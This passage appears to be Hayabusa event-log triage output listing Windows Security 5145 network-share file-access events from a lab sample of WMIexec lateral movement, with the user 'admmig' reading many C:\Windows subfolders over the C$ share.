2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | 
